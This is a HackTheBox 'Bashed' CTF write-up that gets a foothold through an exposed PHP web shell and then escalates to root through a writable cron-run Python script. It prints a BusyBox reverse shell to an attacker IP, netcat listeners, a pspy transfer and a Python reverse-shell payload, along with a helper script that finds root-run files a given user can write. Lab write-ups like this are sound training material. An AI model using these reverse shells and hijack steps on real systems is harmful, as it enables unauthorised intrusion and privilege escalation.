HackTheBox Bashed Writeup

Explore the fundamentals of cybersecurity in the Bashed Capture The Flag (CTF) challenge, an easy-level box. This straightforward writeup walks through the key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.10.68 bashed.htb

Script to add hosts automatically

# Append the mapping once; the grep keeps repeated runs from duplicating it
ip="10.10.10.68"
domain="bashed.htb"
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV bashed.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-27 22:23 CEST
Nmap scan report for bashed.htb (10.10.10.68)
Host is up (0.051s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Directory Discovery

Only TCP port 80 showed up in the scan, so the web application is the way in. Start by using dirb to scan for directories on Bashed HTB:

dirb http://bashed.htb/

The scan reveals the following directories:

==> DIRECTORY: http://bashed.htb/css/
==> DIRECTORY: http://bashed.htb/dev/
==> DIRECTORY: http://bashed.htb/fonts/
==> DIRECTORY: http://bashed.htb/images/
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://bashed.htb/js/
==> DIRECTORY: http://bashed.htb/php/

Getting a Shell:

1. Discover the PHP Bash Web Shell

  • The /dev/ directory found by dirb hosts a PHP Bash web shell. Opening it in the browser gives command execution on the box as the web server user, with no authentication required.

2. Retrieve the User Flag

  • Once inside the PHP Bash web shell, retrieve the arrexel user flag:
cat /home/arrexel/user.txt

3. Check Sudo Privileges

  • After gaining access, check the sudo privileges for the current user:
sudo -l
  • The output reveals:
(scriptmanager : scriptmanager) NOPASSWD: ALL

This means you can execute any command as the scriptmanager user without a password.

4. Find Readable Directories for scriptmanager

  • Locate directories owned by the scriptmanager user by running:
find / -type d -readable -user scriptmanager 2>/dev/null | grep -v '^/proc\|^/run\|^/sys'

This lists directories owned by scriptmanager that the current user can read (-user matches the owner, while -readable is evaluated for the user running find), excluding the pseudo-filesystems under /proc, /run, and /sys; the 2>/dev/null silences permission-denied noise. On this box it turns up /scripts, which matters later.

5. Set Up a Reverse Shell Listener

  • On your attacking machine, set up a listener to catch the reverse shell:
nc -lvnp 9001

6. Initiate a Reverse Shell Using BusyBox

  • Since the available nc (netcat) version on the target system is netcat-openbsd, which lacks the -e option, you can use BusyBox to achieve a reverse shell. On the target machine, execute (10.10.14.9 is the attacker's VPN IP; substitute your own):
busybox nc 10.10.14.9 9001 -e /bin/bash

This command establishes a reverse shell connection to your listener on port 9001.

Get an Interactive Shell: Once the reverse shell connects, upgrade it to a proper TTY. On the target, spawn a pseudo-terminal:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run the following in your local terminal; stty size prints your terminal's rows and columns, and stty raw -echo stops the local terminal from interfering with the remote one before fg brings the shell back:

stty size; stty raw -echo; fg

As the last step, back in the target shell, set the terminal type (and, if long output wraps badly, apply the rows and columns that stty size printed with stty rows <rows> cols <cols>):

export TERM=xterm

Monitor Processes with pspy

Objective: Use pspy to monitor processes without needing root privileges and identify processes being executed by root that may be exploitable.

Step 1: Download pspy

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64

Step 2: Transfer pspy to the Target Server Using Python HTTP Server

  • On your attacking machine, start a Python HTTP server in the directory where pspy64 is located:
  • On your attacking machine, start a Python HTTP server in the directory where pspy64 is located:
python3 -m http.server 8080
  • On the target machine, download pspy64 using wget:
wget http://<vpn-ip>:8080/pspy64 -O /tmp/pspy64
chmod +x /tmp/pspy64

Step 3: Run pspy to Monitor Processes

  • Now that pspy64 is on the target machine, run it to monitor running processes:
/tmp/pspy64
  • While monitoring, pspy may show processes that are periodically executed by root. For example:
2024/09/27 14:02:01 CMD: UID=0     PID=1249   | python test.py
  • This shows that root runs test.py on a schedule. If a lower-privileged user can modify that script, whatever they put in it will execute as root on the next run.
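The correlation described above (pspy shows what root runs; the earlier find shows which directories scriptmanager owns) can be automated. The following Python script is an added example and is not part of the original writeup or of pspy: it parses pspy CMD lines, resolves relative script names against candidate directories, and reports files that root executes but that a given user can overwrite. Everything after the first pspy line, the FAKE_FS table and the choice of uid 1001 for scriptmanager are constructed for the demonstration; real_lookup() is what you would pass on a live host.

```python
"""Correlate pspy output with directories a low-privileged user controls.

Added example, not code from the original writeup or from pspy.  Ownership and
permissions come through a lookup callable so the logic can run on constructed
data; real_lookup() wires it to os.stat for use on a real target.
"""
import os
import re
import shlex
import stat
from collections import namedtuple

PspyCmd = namedtuple("PspyCmd", "ts uid pid cmd")
FileInfo = namedtuple("FileInfo", "uid gid mode")

# Constructed sample input: the first line mirrors the one in the writeup,
# the other two are made up to show the filtering.
SAMPLE_PSPY = """\
2024/09/27 14:02:01 CMD: UID=0     PID=1249   | python test.py
2024/09/27 14:02:01 CMD: UID=0     PID=1250   | /bin/sh /usr/local/bin/backup.sh
2024/09/27 14:02:05 CMD: UID=1000  PID=1251   | bash
"""

# Constructed stand-in for the filesystem (uid 1001 is assumed to be scriptmanager).
FAKE_FS = {
    "/scripts/test.py": FileInfo(uid=1001, gid=1001, mode=0o644),
    "/usr/local/bin/backup.sh": FileInfo(uid=0, gid=0, mode=0o755),
}

INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl", "php", "ruby"}
LINE_RE = re.compile(r"^(\S+ \S+) CMD: UID=(\d+)\s+PID=(\d+)\s+\|\s*(.*)$")


def parse_pspy(text):
    """Return a PspyCmd for every CMD line, skipping anything else."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            out.append(PspyCmd(m.group(1), int(m.group(2)), int(m.group(3)), m.group(4)))
    return out


def script_path(cmd):
    """Pick the file whose contents control this command.

    For an interpreter ('python test.py') that is the script argument;
    otherwise it is the executable itself (argv[0]).
    """
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    if not argv:
        return None
    if os.path.basename(argv[0]) in INTERPRETERS:
        for arg in argv[1:]:
            if not arg.startswith("-"):
                return arg
        return None
    return argv[0]


def writable_by(info, uid, gids):
    """True if a user with this uid and group set can write the file."""
    if info.uid == uid and info.mode & stat.S_IWUSR:
        return True
    if info.gid in gids and info.mode & stat.S_IWGRP:
        return True
    return bool(info.mode & stat.S_IWOTH)


def find_hijackable(pspy_text, search_dirs, lookup, uid, gids):
    """Sorted (command, resolved_path) pairs that root runs and uid can edit.

    pspy prints argv only, not the working directory, so relative names are
    tried against each directory in search_dirs (e.g. what find reported).
    """
    hits = set()
    for rec in parse_pspy(pspy_text):
        if rec.uid != 0:
            continue
        path = script_path(rec.cmd)
        if path is None:
            continue
        candidates = [path] if os.path.isabs(path) else [os.path.join(d, path) for d in search_dirs]
        for cand in candidates:
            info = lookup(cand)
            if info is not None and writable_by(info, uid, gids):
                hits.add((rec.cmd, cand))
    return sorted(hits)


def real_lookup(path):
    """os.stat wrapper for a live host; None if the path does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return FileInfo(st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode))


if __name__ == "__main__":
    for cmd, path in find_hijackable(SAMPLE_PSPY, ["/scripts"], FAKE_FS.get, 1001, {1001}):
        print("root runs %r -> %s is writable by uid 1001" % (cmd, path))
```

On a real target, save pspy's output to a file and call find_hijackable with that text, the directories from the find step, real_lookup, os.getuid() and set(os.getgroups()). Resolving relative names against candidate directories is the important detail: the pspy line in the writeup shows only "python test.py", and it is the find output that tells you the file lives in /scripts.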

1. Switch to scriptmanager User

  • test.py is owned by scriptmanager, switch to scriptmanager:
sudo -u scriptmanager bash

2. Edit test.py

  • Navigate to the location of test.py, which was identified by pspy, and edit the script to include a Python reverse shell payload:
nano /scripts/test.py
  • Replace the contents of test.py with the following reverse shell code. The cron job invokes it as python, so keep the payload compatible with whatever that resolves to on the target; this snippet runs unchanged on both Python 2 and Python 3.

Replace <vpn-ip> with your actual VPN IP to receive the connection.

import socket, os, pty
# Connect back to the listener on the attacking machine
s = socket.socket(); s.connect(("<vpn-ip>", 9002))
# Point stdin, stdout and stderr at the socket
for fd in (0, 1, 2): os.dup2(s.fileno(), fd)
# Spawn bash on a pty so the shell is interactive from the start
pty.spawn("/bin/bash")

3. Set up a Listener

  • On your local machine (the attacker machine), set up a listener to capture the reverse shell:
nc -lvnp 9002

4. Wait for Execution

  • The test.py script is executed periodically by root, as observed in pspy. Wait for the next execution, and the reverse shell should connect to your listener.

5. Capture Root Access

  • Once the reverse shell connects, you should have a shell as root. Verify it with id (expect uid=0), then read the root flag:
cat /root/root.txt

This post is licensed under CC BY 4.0 by the author.